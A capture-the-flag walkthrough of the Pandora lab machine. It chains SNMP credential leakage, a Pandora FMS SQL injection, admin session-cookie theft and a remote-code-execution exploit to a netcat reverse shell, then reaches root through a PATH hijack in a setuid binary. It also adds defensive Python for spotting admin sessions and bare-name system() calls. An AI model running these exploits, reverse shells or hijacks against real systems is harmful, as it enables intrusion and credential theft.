Pandora
Enumeration
$ nmap -A -T4 --min-rate 5000 -p- -n -Pn --open 10.10.11.136
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-10 18:15 CEST
Nmap scan report for 10.10.11.136
Host is up (0.041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 39.83 ms 10.10.14.1
2 39.97 ms 10.10.11.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.33 seconds
$ sudo nmap -sU --top-ports 100 -Pn --open 10.10.11.136
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-10 18:16 CEST
Nmap scan report for 10.10.11.136
Host is up (0.041s latency).
Not shown: 95 closed udp ports (port-unreach)
PORT STATE SERVICE
161/udp open snmp
Nmap done: 1 IP address (1 host up) scanned in 98.41 seconds
The site is a landing page for Play (http-title "Play | Landing"). Using snmpwalk to enumerate SNMP, we find credentials:
daniel:HotelBabylon23
Initial Access
Access the machine via SSH as daniel:
$ ssh daniel@10.10.11.136
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
...
daniel@pandora:~$ whoami
daniel
Looking at the Apache sites:
daniel@pandora:/var/www/pandora/pandora_console/include$ cat /etc/apache2/sites-enabled/pandora.conf
<VirtualHost localhost:80>
ServerAdmin admin@panda.htb
ServerName pandora.panda.htb
DocumentRoot /var/www/pandora
AssignUserID matt matt
<Directory /var/www/pandora>
AllowOverride All
</Directory>
ErrorLog /var/log/apache2/error.log
CustomLog /var/log/apache2/access.log combined
</VirtualHost>
The vhost binds to localhost only, so we forward port 80 to our local machine (port 8888 below) and browse it. Note AssignUserID matt matt: the vhost runs as matt, so any code execution through it lands as matt.
We find https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated, which exploits CVE-2021-32099 (an unauthenticated SQL injection in Pandora FMS):
$ python sqlpwn.py -t 127.0.0.1:8888
URL: http://127.0.0.1:8888/pandora_console
[+] Sending Injection Payload
[+] Requesting Session
[+] Admin Session Cookie : 8q0ui8evsal456qs5s60jt3hc3
[+] Sending Payload
[+] Respose : 200
[+] Pwned :)
[+] If you want manual Control : http://127.0.0.1:8888/pandora_console/images/pwn.php?test=
CMD > whoami
matt
Now, as matt, we can read Pandora's config file:
CMD > cat /var/www/pandora/pandora_console/include/config.php
<?php
// File generated by centos kickstart
$config["dbtype"] = "mysql";
$config["dbname"]="pandora";
$config["dbuser"]="pandora";
$config["dbpass"]="PandoraFMSSecurePass2021";
$config["dbhost"]="localhost";
$config["homedir"]="/var/www/pandora/pandora_console";
$config["homeurl"]="/pandora_console";
error_reporting(0);
$ownDir = dirname(__FILE__) . '/';
include ($ownDir . "config_process.php");
?>
daniel@pandora:~$ mysql -u pandora -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 20
Server version: 10.3.32-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| pandora |
+--------------------+
2 rows in set (0.000 sec)
MariaDB [(none)]>
PHP sessions are stored in the tsessions_php table:
MariaDB [pandora]> select * from tsessions_php;
+----------------------------+-------------+------------------------------------------------------+
| id_session | last_active | data |
+----------------------------+-------------+------------------------------------------------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | 1638783555 | id_usuario|s:6:"daniel"; |
| 0ahul7feb1l9db7ffp8d25sjba | 1638789018 | NULL |
| 1p2c0cm9eed4u6npgr1ufdhg3v | 1749572113 | id_usuario|s:6:"daniel"; |
| 1um23if7s531kqf5da14kf5lvm | 1638792211 | NULL |
| 2e25c62vc3odbppmg6pjbf9bum | 1638786129 | NULL |
| 346uqacafar8pipuppubqet7ut | 1638540332 | id_usuario|s:6:"daniel"; |
| 3me2jjab4atfa5f8106iklh4fc | 1638795380 | NULL |
| 4f51mju7kcuonuqor3876n8o02 | 1638786842 | NULL |
| 4nsbidcmgfoh1gilpv8p5hpi2s | 1638535373 | id_usuario|s:6:"daniel"; |
| 59qae699l0971h13qmbpqahlls | 1638787305 | NULL |
| 5fihkihbip2jioll1a8mcsmp6j | 1638792685 | NULL |
| 5i352tsdh7vlohth30ve4o0air | 1638281946 | id_usuario|s:6:"daniel"; |
| 69gbnjrc2q42e8aqahb1l2s68n | 1641195617 | id_usuario|s:6:"daniel"; |
| 81f3uet7p3esgiq02d4cjj48rc | 1623957150 | NULL |
| 8m2e6h8gmphj79r9pq497vpdre | 1638446321 | id_usuario|s:6:"daniel"; |
| 8q0ui8evsal456qs5s60jt3hc3 | 1749578577 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; |
| 8upeameujo9nhki3ps0fu32cgd | 1638787267 | NULL |
| 9vv4godmdam3vsq8pu78b52em9 | 1638881787 | id_usuario|s:6:"daniel"; |
| a3a49kc938u7od6e6mlip1ej80 | 1638795315 | NULL |
| agfdiriggbt86ep71uvm1jbo3f | 1638881664 | id_usuario|s:6:"daniel"; |
| cojb6rgubs18ipb35b3f6hf0vp | 1638787213 | NULL |
| d0carbrks2lvmb90ergj7jv6po | 1638786277 | NULL |
| f0qisbrojp785v1dmm8cu1vkaj | 1641200284 | id_usuario|s:6:"daniel"; |
| fikt9p6i78no7aofn74rr71m85 | 1638786504 | NULL |
| fqd96rcv4ecuqs409n5qsleufi | 1638786762 | NULL |
| g0kteepqaj1oep6u7msp0u38kv | 1638783230 | id_usuario|s:6:"daniel"; |
| g4e01qdgk36mfdh90hvcc54umq | 1638796349 | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; |
| gf40pukfdinc63nm5lkroidde6 | 1638786349 | NULL |
| heasjj8c48ikjlvsf1uhonfesv | 1638540345 | NULL |
| hsftvg6j5m3vcmut6ln6ig8b0f | 1638168492 | id_usuario|s:6:"daniel"; |
| jecd4v8f6mlcgn4634ndfl74rd | 1638456173 | id_usuario|s:6:"daniel"; |
| kp90bu1mlclbaenaljem590ik3 | 1638787808 | NULL |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | 1638796348 | NULL |
| nhc3tnsv7bckvim3bsh8r3jekc | 1749578186 | NULL |
| o3kuq4m5t5mqv01iur63e1di58 | 1638540482 | id_usuario|s:6:"daniel"; |
| oi2r6rjq9v99qt8q9heu3nulon | 1637667827 | id_usuario|s:6:"daniel"; |
| pjp312be5p56vke9dnbqmnqeot | 1638168416 | id_usuario|s:6:"daniel"; |
| qef3kp8hummmlqf0omrv8bbv5d | 1749578204 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | 1638787723 | NULL |
| r097jr6k9s7k166vkvaj17na1u | 1638787677 | NULL |
| rgku3s5dj4mbr85tiefv53tdoa | 1638889082 | id_usuario|s:6:"daniel"; |
| u5ktk2bt6ghb7s51lka5qou4r4 | 1638547193 | id_usuario|s:6:"daniel"; |
| u74bvn6gop4rl21ds325q80j0e | 1638793297 | id_usuario|s:6:"daniel"; |
+----------------------------+-------------+------------------------------------------------------+
43 rows in set (0.001 sec)
In the browser, replace the current session cookie with the admin one.
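The session store is what makes the cookie swap possible: anyone holding the database password from config.php can read every live session, including the admin ones. As an added example (not from the writeup or from Pandora FMS), this Python decodes PHP's session_encode() layout and lists which sessions belong to privileged users, a check an administrator can run against tsessions_php to spot admin sessions that should not exist; SAMPLE_ROWS is a subset of the table above.

```python
from datetime import datetime, timezone

def _parse_value(data, pos):
    """Parse one PHP-serialized value at data[pos]; return (value, next_pos)."""
    t = data[pos]
    if t == "N":                                   # N;
        return None, pos + 2
    if t in "ib":                                  # i:123;  b:0;
        end = data.index(";", pos)
        return (int(data[pos + 2:end]) if t == "i" else data[pos + 2:end] == "1"), end + 1
    if t == "s":                                   # s:5:"admin";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                          # skip :"
        return data[start:start + length], start + length + 2   # skip ";
    if t == "a":                                   # a:2:{key value key value}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        pos, result = colon + 2, {}                # skip :{
        for _ in range(count):
            key, pos = _parse_value(data, pos)
            result[key], pos = _parse_value(data, pos)
        return result, pos + 1                     # skip }
    raise ValueError(f"unsupported PHP type {t!r} at offset {pos}")

def parse_php_session(data):
    """Decode PHP's session_encode() layout: key|value key|value ..."""
    out, pos = {}, 0
    while pos < len(data):
        bar = data.index("|", pos)
        out[data[pos:bar]], pos = _parse_value(data, bar + 1)
    return out

def privileged_sessions(rows, privileged=("admin",)):
    """(id_session, user, last_active in UTC) for every session of a privileged user."""
    hits = []
    for sid, last_active, data in rows:
        if data is None:                           # row never held session data
            continue
        user = parse_php_session(data).get("id_usuario")
        if user in privileged:
            seen = datetime.fromtimestamp(last_active, timezone.utc)
            hits.append((sid, user, seen.strftime("%Y-%m-%d %H:%M:%SZ")))
    return hits

SAMPLE_ROWS = [  # subset of the tsessions_php rows shown above
    ("0ahul7feb1l9db7ffp8d25sjba", 1638789018, None),
    ("8q0ui8evsal456qs5s60jt3hc3", 1749578577, 'id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0;'),
    ("g4e01qdgk36mfdh90hvcc54umq", 1638796349, 'id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0;'),
]
```

The admin session in the sample was last active in June 2025 while every other row dates from late 2021, which is exactly the kind of outlier this listing is meant to surface.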
Now that we have an admin session, we can use https://github.com/UNICORDev/exploit-CVE-2020-5844 to get a reverse shell as matt.
$ python exploit-CVE-2020-5844.py -t localhost 8888 -p qef3kp8hummmlqf0omrv8bbv5d -s 10.10.1
_ __,~~~/_ __ ___ _______________ ___ ___
,~~`( )_( )-\| / / / / |/ / _/ ___/ __ \/ _ \/ _ \
|/| `--. / /_/ / // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
UNICORD: Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution
OPTIONS: Reverse Shell Mode
PHPSESS: qef3kp8hummmlqf0omrv8bbv5d
LOCALIP: 10.10.14.17:9999
WARNING: Be sure to start a local listener on the above IP and port.
WEBSITE: http://localhost:8888/pandora_console
EXPLOIT: Connected to website! Status Code: 200
EXPLOIT: Logged into Pandora FMS!
SUCCESS: Reverse shell executed! Check your local listener on 10.10.14.17:9999
$ rlwrap nc -lnvp 9999
listening on [any] 9999 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.11.136] 52538
/bin/sh: 0: can't access tty; job control turned off
$ whoami
matt
Get the flag
Privilege Escalation
Enumerating SUID binaries, the interesting one is pandora_backup:
matt@pandora:/home/matt$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
Using strings, we see that tar is invoked with a wildcard.
The script fails with permission denied; it seems this shell is not a suitable context for it. Generate an SSH key pair and put the public key in matt's .ssh folder:
matt@pandora:/home/matt/.ssh$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPpq+RmAIzEEXxkHuxX6zq9ZW46HG/z9DVBlgyhYhhF7 kali@kali" > authorized_keys
matt@pandora:/home/matt/.ssh$ chmod 600 authorized_keys
$ ssh matt@10.10.11.136 -i id_rsa
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
...
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
matt@pandora:~$
Now the script works.
Inspecting the binary with ltrace, we can see that the tar executable is called by its bare name rather than an absolute path, so the shell resolves it through the caller's PATH:
matt@pandora:/var/www/pandora/pandora_console$ ltrace /usr/bin/pandora_backup
getuid() = 1000
geteuid() = 1000
setreuid(1000, 1000) = 0
puts("PandoraFMS Backup Utility"PandoraFMS Backup Utility
) = 26
puts("Now attempting to backup Pandora"...Now attempting to backup PandoraFMS client
) = 43
system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 512
puts("Backup failed!\nCheck your permis"...Backup failed!
Check your permissions!
) = 39
+++ exited (status 1) +++
So we can hijack the tar call. Create a file named tar in the home directory:
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
Backup successful!
Terminating program!
matt@pandora:~$ ls -alh /bin/bash
-rwsr-sr-x 1 root root 1.2M Jun 18 2020 /bin/bash
matt@pandora:~$ bash -p
bash-5.0# whoami
root
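The root cause here is a setuid binary that hands "tar ..." to system() by bare name and never pins PATH, so whatever the caller puts first in PATH runs with the binary's privileges. As an added example (not from the writeup or from Pandora FMS), this Python reads ltrace-style output and flags shell commands launched by bare name, and whether the binary sets PATH itself, a quick audit to run over setuid programs before they ship; SAMPLE_TRACE is constructed after the trace above.

```python
import re
from dataclasses import dataclass

# Constructed ltrace-style sample, modelled on the pandora_backup trace above.
SAMPLE_TRACE = """\
getuid() = 1000
setreuid(1000, 1000) = 0
puts("PandoraFMS Backup Utility") = 26
system("tar -cvf /root/.backup/pandora-b"...tar: Cannot open: Permission denied
<... system resumed> ) = 512
puts("Backup failed!") = 15
"""

@dataclass
class Finding:
    func: str      # libc call that handed a command line to /bin/sh
    program: str   # first word of the command, i.e. what the shell looks up
    command: str   # the (possibly truncated) command string from the trace

SHELL_CALL = re.compile(r'^(system|popen)\("([^"]*)"')
PATH_PIN = re.compile(r'^(setenv\("PATH"|putenv\("PATH=)')

def audit_trace(trace):
    """Return (findings, pins_path): commands run by bare name, and whether PATH is set."""
    findings, pins_path = [], False
    for raw in trace.splitlines():
        line = raw.strip()
        if PATH_PIN.match(line):
            pins_path = True
            continue
        m = SHELL_CALL.match(line)
        if not m:
            continue
        func, cmd = m.groups()
        words = cmd.split()
        program = words[0] if words else ""
        if program and "/" not in program:      # no slash: resolved through PATH
            findings.append(Finding(func, program, cmd))
    return findings, pins_path

def needs_path_hardening(trace):
    """True when a command is run by bare name and the binary never pins PATH."""
    findings, pins_path = audit_trace(trace)
    return bool(findings) and not pins_path
```

The fix on the binary side is the mirror image of what the audit checks: invoke /usr/bin/tar by absolute path (or execve it directly instead of going through system()) and set a fixed PATH before anything else runs.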
Post Exploitation
Get the flag